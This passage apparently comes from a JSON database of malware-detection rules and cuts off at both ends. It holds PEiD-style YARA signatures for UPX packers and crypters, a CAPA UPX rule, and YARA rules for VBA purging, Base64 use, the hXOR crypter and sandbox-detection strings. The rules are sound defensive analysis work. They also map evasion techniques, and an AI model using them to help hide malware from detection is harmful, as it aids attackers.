pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 
00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB 8A 07 EB B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v051_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_dj_siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? 43 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 00 00 00 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? 
E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_071_072_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 09 00 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Inliner_10_by_GPcH: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0991_0993_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE B0 00 00 00 8D BE 50 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL: PEiD\r\n{\r\n    
strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_122_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 32 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_082_083_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { 81 FC 00 00 77 02 CD 20 B9 00 00 BE 00 00 BF 00 00 BB 00 80 FD F3 A4 FC 87 F7 83 EE C6 19 ED 57 57 E9 00 00 55 50 58 21 0A 01 04 07 00 00 00 00 00 00 00 00 00 00 00 00 06 00 FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 ?? ?? ?? ?? 
90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V300_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_05_snaker: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_UPX_0896_102_105_124_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 64 A0 23 00 00 00 83 C5 06 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXShit_006: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? 43 00 B9 15 00 00 00 80 34 08 ?? 
E2 FA E9 D6 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_070_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 CB 55 50 58 21 08 00 02 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v070_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n        $b = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_290_LZMA_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_Stub_c_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 
57 83 CD FF FC B2 80 E8 00 00 00 00 5B 83 C3 66 A4 FF D3 73 FB 31 C9 FF D3 73 14 31 C0 FF D3 73 1D 41 B0 10 FF D3 10 C0 73 FA 75 3C AA EB E2 E8 4A 00 00 00 49 E2 10 E8 40 00 00 00 EB 28 AC D1 E8 74 45 11 C9 EB 1C 91 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n        $b = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_030_040_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 00 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_020_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF BD FF FF FD F3 A4 FC F7 E1 93 87 F7 83 C6 31 57 57 E9 3C FE 55 50 58 21 03 01 02 87 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_125_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 35 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 
00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_Scrambler_vna: PEiD\r\n{\r\n    strings:\r\n        $a = { C7 45 FC ?? ?? ?? ?? 6A 04 6A 00 6A 00 68 FF FF FB FF FF 15 ?? ?? ?? ?? 85 C0 7E ?? 6A 00 FF 15 ?? ?? ?? ?? 8B 45 FC 8B 40 04 83 E8 03 8B 4D FC 89 41 04 83 65 F4 00 EB ?? 8B 45 F4 40 89 45 F4 8B 45 FC 8B 4D F4 3B 48 04 73 ?? 8B 45 FC 8B 40 04 2B 45 F4 8B 4D FC 8B 09 8B 55 FC 8B 44 01 FF 33 42 0C 8B 4D FC 8B 49 04 2B 4D F4 8B 55 FC 8B 12 89 44 11 FF EB ?? 8B 45 FC 8B 40 08 89 45 F8 8B 45 F8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_or_File_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 86 EA FE FF 81 C2 45 23 01 00 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_072_COM: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 00 00 BE 00 00 BF C0 FF FD F3 A4 FC F7 E1 93 87 F7 83 EE 00 19 ED 57 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 94,
            "key": "upx-packer-detection",
            "type": {
                "id": 2,
                "name": "CAPA",
                "syntax_lang": "yaml"
            },
            "name": "UPX Packer Detection",
            "rule": "rule:\r\n  meta:\r\n    name: packed with UPX\r\n    namespace: anti-analysis/packer/upx\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::UPX [F0001.008]\r\n    examples:\r\n      - CD2CBA9E6313E8DF2C1273593E649682\r\n      - Practical Malware Analysis Lab 01-02.exe_:0x0401000\r\n  features:\r\n    - or:\r\n      - and:\r\n        - format: pe\r\n        - or:\r\n          - section: UPX0\r\n          - section: UPX1\r\n      - and:\r\n        - format: elf\r\n        - or:\r\n          - string: \"UPX!\""
        },
        {
            "id": 162,
            "key": "vbapurging",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "VBAPurging",
            "rule": "rule FEYE_OLE_VBAPurged_2 {\r\n    meta:\r\n        author = \"Michael Bailey (@mykill), Jonell Baltazar, Alyssa Rahman (@ramen0x3f), Joseph Reyes\"\r\n        description = \"This file has a suspicious _VBA_PROJECT header and a small _VBA_PROJECT stream. This may be evidence of the VBA purging tool OfficePurge or a tool-generated document.\"\r\n    strings:\r\n        $vba_proj = { 5F 00 56 00 42 00 41 00 5F 00 50 00 52 00 4F 00 4A 00 45 00 43 00 54 00 00 00 00 00 00 00 00 00 }\r\n        $cc61 = {CC 61 FF FF 00 00 00}\r\n    condition:\r\n        uint32(0) == 0xe011cfd0 and ( uint32(@vba_proj[1] + 0x78) >= 0x07 ) and ( uint32(@vba_proj[1] + 0x78) < 0xff ) and $cc61\r\n}"
        },
        {
            "id": 146,
            "key": "yara_base64",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Base64",
            "rule": "rule golang_base64_enc {\r\n\tmeta:\r\n\t\tauthor = \"RussianPanda\"\r\n\t\tdecription = \"Detects Base64 Encoding and Decoding patterns in Golang binaries\"\r\n        \treference = \"https://unprotect.it/technique/base64/\"\r\n\t\tdate = \"1/10/2024\"\r\n\t\thash = \"509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c\"\r\n\tstrings:\r\n\t        $s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}\r\n\t        $s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}\r\n\t        $s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}\r\n\t\t$s4 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n \tcondition:\r\n\t\tall of ($s*) \r\n        \tand uint16(0) == 0x5A4D\r\n}\r\n\r\n\r\nrule base64_enc {\r\n\tmeta:\r\n\t\tauthor = \"RussianPanda\"\r\n\t\tdecription = \"Detects Base64 Encoding\"\r\n        \treference = \"https://unprotect.it/technique/base64/\"\r\n\t\tdate = \"1/10/2024\"\r\n\t\thash = \"09506d1af5d8e6570b2b7d05143f444f5685d2a9f3304780ef376edf7b2d79e6\"\r\n\tstrings:\r\n\t\t$s2 = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\r\n        \t$s3 = {83 E? 3F}\r\n \tcondition:\r\n\t\tall of ($s*) \r\n        \tand uint16(0) == 0x5A4D\r\n\t\t\r\n}"
        },
        {
            "id": 156,
            "key": "yara_buildcommdcbandtimeouts",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_BuildCommDCBAndTimeouts",
            "rule": "rule BuildCommDCBAndTimeouts \r\n{\r\n    meta:\r\n        author = \"Unprotect\"\r\n        contributors = \"Huntress Research Team | Unprotect Project\"\r\n        description = \"Detects usage of BuildCommDCBAndTimeouts function call\"\r\n        status = \"experimental\"\r\n\r\n    strings:\r\n        $s1 = \"jhl46745fghb\" ascii wide nocase\r\n        $s2 = \"BuildCommDCBAndTimeouts\" ascii wide nocase\r\n\r\n    condition:\r\n        uint16(0) == 0x5a4d and ($s2 or ($s2 and $s1))\r\n}"
        },
        {
            "id": 138,
            "key": "yara_crypt_hxor",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_CRYPT_hXOR",
            "rule": "rule SI_CRYPT_hXOR_Jan24 : Crypter {\r\n\r\n    meta:\r\n        version = \"1.0\"\r\n        date = \"2024-01-04\"\r\n        modified = \"2024-01-18\"\r\n        status = \"RELEASED\"\r\n        sharing = \"TLP:CLEAR\"\r\n        source = \"SECUINFRA Falcon Team\"\r\n        author = \"Marius Genheimer @ Falcon Team\"\r\n        description = \"Detects executables packed/encrypted with the hXOR-Packer open-source crypter.\"\r\n        category = \"TOOL\"\r\n        mitre_att = \"T1027.002\"\r\n        actor_type = \"CRIMEWARE\"\r\n        reference = \"https://github.com/akuafif/hXOR-Packer\"\r\n        hash = \"7712186f3e91573ea1bb0cc9f85d35915742b165f9e8ed3d3e795aa5e699230f\"\r\n        minimum_yara = \"2.0.0\"\r\n        best_before = \"2025-01-04\"\r\n\r\n    strings:\r\n        //This rule has been validated for the compression, encryption and compression+encryption modes of hXOR\r\n\r\n        //Signature to locate the payload\r\n        $binSignature = {46 49 46 41} \r\n\r\n        //Strings likely to be removed in attempts to conceal crypter\r\n        $s_1 = \"hXOR Un-Packer by Afif, 2012\"\r\n        $s_2 = \"C:\\\\Users\\\\sony\\\\Desktop\\\\Packer\\\\\"\r\n        $s_3 = \"H:\\\\Libraries\\\\My Documents\\\\Dropbox\\\\Ngee Ann Poly\\\\Semester 5\\\\Packer\"\r\n        $s_4 = \"Scanning for Sandboxie...\"\r\n        $s_5 = \"Scanning for VMware...\"\r\n        $s_6 = \"Executing from Memory >>>>\"\r\n        $s_7 = \"Extracting >>>>\"\r\n        $s_8 = \"Decompressing >>>>\"\r\n        $s_9 = \"Decrypting >>>>\"\r\n\r\n        //Anti-Analysis\r\n        $aa_1 = \"SbieDll.dll\"\r\n        $aa_2 = \"VMwareUser.exe\"\r\n        $aa_3 = \"GetTickCount\"\r\n        $aa_4 = \"CreateToolhelp32Snapshot\"\r\n\r\n    condition:\r\n        uint16(0) == 0x5A4D\r\n        and uint16(0x28) != 0x0000 //IMAGE_DOS_HEADER.e_res2[0] contains offset for payload\r\n        and $binSignature in (200000..filesize)\r\n        and for all of ($s_*): (# >= 
0) //these strings are optional\r\n        and 3 of ($aa_*)\r\n}"
        },
        {
            "id": 129,
            "key": "yara_checkname",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_CheckName",
            "rule": "rule MalwareNameEvasion\r\n{\r\n    strings:\r\n        // Check for the GetModuleFileName() function call\r\n        $get_module_filename = \"GetModuleFileName\"\r\n\r\n        // Check for the find_last_of() method call\r\n        $find_last_of = \"find_last_of\"\r\n\r\n        // Check for the std::string data type\r\n        $string = \"std::string\"\r\n\r\n        // Check for the \"\\\\/\" string\r\n        $backslash_slash = \"\\\\\\\\/\"\r\n\r\n        // Check for the \"sample.exe\" string\r\n        $sample_exe = \"sample.exe\"\r\n\r\n        // Check for the \"malware.exe\" string\r\n        $malware_exe = \"malware.exe\"\r\n\r\n    condition:\r\n        // Check if all the required strings are present in the code\r\n        all of them\r\n}"
        },
        {
            "id": 153,
            "key": "yara_check_install_software",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Check_Install_software",
            "rule": "rule check_installed_software {\r\n\r\n  meta:\r\n    author = \"RussianPanda\"\r\n    date = \"1/14/2024\"\r\n    reference = \"https://unprotect.it/technique/checking-installed-software/\"\r\n    hash = \"db44d4cd1ea8142790a6b26880b41ee23de5db5c2a63afb9ee54585882f1aa07\"\r\n\r\n  strings:\r\n    $d1 = \"DisplayVersion\"\r\n    $u1 = \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\"\r\n    $reg = \"RegOpenKeyExA\"\r\n    $h = {68 (01|02) 00 00 80}\r\n\r\n  condition:\r\n    uint16(0) == 0x5A4D\r\n    and for any i in (1..#u1) : ($d1 in (@u1[i] - 200..@u1[i] + 200))\r\n    and $reg and $h\r\n\r\n}"
        },
        {
            "id": 124,
            "key": "yara_dllproxying",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_DLLProxying",
